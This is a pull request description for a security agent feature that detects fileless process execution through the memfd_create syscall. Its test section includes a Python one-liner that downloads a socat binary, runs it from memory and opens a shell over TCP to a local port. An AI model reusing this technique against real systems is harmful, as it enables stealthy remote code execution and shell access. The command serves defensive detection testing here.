[CWS] Detect fileless execution

[modernplumbing]

What does this PR do?

https://datadoghq.atlassian.net/wiki/spaces/SA/pages/2593980417/Fileless+Process+Execution

This feature catches the usage of the memfd_create syscall (https://man7.org/linux/man-pages/man2/memfd_create.2.html) with a rule like exec.file.path =~ "/memfd:*".

Motivation

Additional Notes

Possible Drawbacks / Trade-offs

Describe how to test/QA your changes

Add rule like exec.file.path =~ "/memfd:*" and trigger with a command like:

python3 -c 'import os;from urllib.request import urlopen;fd = os.memfd_create("", os.MFD_CLOEXEC);f2=open("/proc/self/fd/"+str(fd), "wb");f1=urlopen("https://github.com/3ndG4me/socat/releases/download/v1.7.3.3/socatx64.bin").read();f2.write(f1);f2.close();os.execv("/proc/self/fd/"+str(fd), ["kittens", "TCP:127.0.0.1:4242", "EXEC:sh"])'

Reviewer's Checklist

• [ ] If known, an appropriate milestone has been selected; otherwise the Triage milestone is set.
• [ ] Use the major_change label if your change either has a major impact on the code base, is impacting multiple teams or is changing important well-established internals of the Agent. This label will be use during QA to make sure each team pay extra attention to the changed behavior. For any customer facing change use a releasenote.
• [ ] A release note has been added or the changelog/no-changelog label has been applied.
• [ ] Changed code has automated tests for its functionality.
• [ ] Adequate QA/testing plan information is provided if the qa/skip-qa label is not applied.
• [ ] At least one team/.. label has been applied, indicating the team(s) that should QA this change.
• [ ] If applicable, docs team has been notified or an issue has been opened on the documentation repo.
• [ ] If applicable, the need-change/operator and need-change/helm labels have been applied.
• [ ] If applicable, the k8s/<min-version> label, indicating the lowest Kubernetes version compatible with this feature.
• [ ] If applicable, the config template has been updated.